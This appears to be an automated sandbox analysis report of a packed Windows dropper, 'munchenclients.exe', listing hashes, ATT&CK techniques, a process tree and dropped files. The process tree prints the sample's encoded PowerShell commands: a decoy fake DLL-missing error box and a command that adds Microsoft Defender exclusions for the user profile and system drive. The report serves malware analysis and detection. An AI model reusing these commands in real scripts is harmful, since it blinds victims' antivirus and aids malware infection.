e1776f0997d5d91ca25490e8948e449fefbf4d56ef442b64cc1bf94fb680c661

General

Target

munchenclients.exe
Size

5.9MB
MD5

ea11d7c22e4b34f7acccaa5154263a6c
SHA1

1bdfc6ec9aa260783546ed35fcc996cedda7b193
SHA256

e1776f0997d5d91ca25490e8948e449fefbf4d56ef442b64cc1bf94fb680c661
SHA512

47b95e0f54fc4975788e55a784066577cd70512cd0508e8d13c256cac72f768c0d3b505411275d885108047fd1459da09ac76d567d8eeb455b3768ae1a778272
SSDEEP

98304:WWL8G5qmUQXxBxY9GQyEWv4rcUR0nUk6I7UpmYqUhx3JLTg/NUorORV0VH2LKieo:L8G5levcGcUR0nUe4gShvLM/CrCV2ui6

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
2592	Built.exe
2708	Built.exe
1208	Process not Found

Loads dropped DLL 4 IoCs

pid	Process
2232	munchenclients.exe
2592	Built.exe
2708	Built.exe
1208	Process not Found

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000015d87-36.dat	upx
behavioral1/memory/2708-38-0x000007FEF5FB0000-0x000007FEF641E000-memory.dmp	upx

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe
2736	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2736	powershell.exe
2968	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 2232 wrote to memory of 2968	2232	munchenclients.exe	28
PID 2232 wrote to memory of 2968	2232	munchenclients.exe	28
PID 2232 wrote to memory of 2968	2232	munchenclients.exe	28
PID 2232 wrote to memory of 2968	2232	munchenclients.exe	28
PID 2232 wrote to memory of 2736	2232	munchenclients.exe	30
PID 2232 wrote to memory of 2736	2232	munchenclients.exe	30
PID 2232 wrote to memory of 2736	2232	munchenclients.exe	30
PID 2232 wrote to memory of 2736	2232	munchenclients.exe	30
PID 2232 wrote to memory of 2592	2232	munchenclients.exe	32
PID 2232 wrote to memory of 2592	2232	munchenclients.exe	32
PID 2232 wrote to memory of 2592	2232	munchenclients.exe	32
PID 2232 wrote to memory of 2592	2232	munchenclients.exe	32
PID 2592 wrote to memory of 2708	2592	Built.exe	33
PID 2592 wrote to memory of 2708	2592	Built.exe	33
PID 2592 wrote to memory of 2708	2592	Built.exe	33

C:\Users\Admin\AppData\Local\Temp\munchenclients.exe
"C:\Users\Admin\AppData\Local\Temp\munchenclients.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2232
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAeABoACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAbQBuACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABwAHIAbwBnAHIAYQBtACAAYwBhAG4AGSB0ACAAcwB0AGEAcgB0ACAAYgBlAGMAYQB1AHMAZQAgAE0AUwBWAEMAUAAxADQAMAAuAGQAbABsACAAaQBzACAAbQBpAHMAcwBpAG4AZwAgAGYAcgBvAG0AIAB5AG8AdQByACAAYwBvAG0AcAB1AHQAZQByAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHEAcABlACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AagBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAbAB3ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAcAB1ACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2736
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2592
- - C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2708

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI25922\python310.dll

Filesize
1.4MB

MD5
178a0f45fde7db40c238f1340a0c0ec0

SHA1
dcd2d3d14e06da3e8d7dc91a69b5fd785768b5fe

SHA256
9fcb5ad15bd33dd72122a171a5d950e8e47ceda09372f25df828010cde24b8ed

SHA512
4b790046787e57b9414a796838a026b1530f497a75c8e62d62b56f8c16a0cbedbefad3d4be957bc18379f64374d8d3bf62d3c64b53476c7c5005a7355acd2cee

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
6402d5bfe4e4a928d81e55170d4ec33b

SHA1
c8184eb00f2e7ff56617468e086ddda45a131c83

SHA256
c53cec554ca12e9b282f40024702f4ef28990ee2f34443d3292d66e2f9b78231

SHA512
ddc9dae70aee20e85237f595969a75764c5c4f9ee1e2ec2e239a2599b5c8c9c50d3baede955989d793a095f318fce9c8a682f5bcd96d370dfeba3fcc471348f9

Download Submit
\Users\Admin\AppData\Local\Temp\Built.exe

Filesize
5.9MB

MD5
6ef38dfd53a643a2225848759960dbac

SHA1
29cfc9715c4e978a82734459cef0ff9a1ce4ddc4

SHA256
945a4092e68d2d3a5b18b8edfd6fe23e3ee96747c05fe5a8bd98a5a3b3a34a5f

SHA512
1a31a137cf4071c30488e64abc50291c8a6435d68d5f873d7f53d08621bc346ca09065647fc3c0fa70fc269544461bab78060e9e61ff98435d70b87c28b8a4b1

Download Submit
memory/2708-38-0x000007FEF5FB0000-0x000007FEF641E000-memory.dmp

Filesize
4.4MB

Download

Analysis

Sharing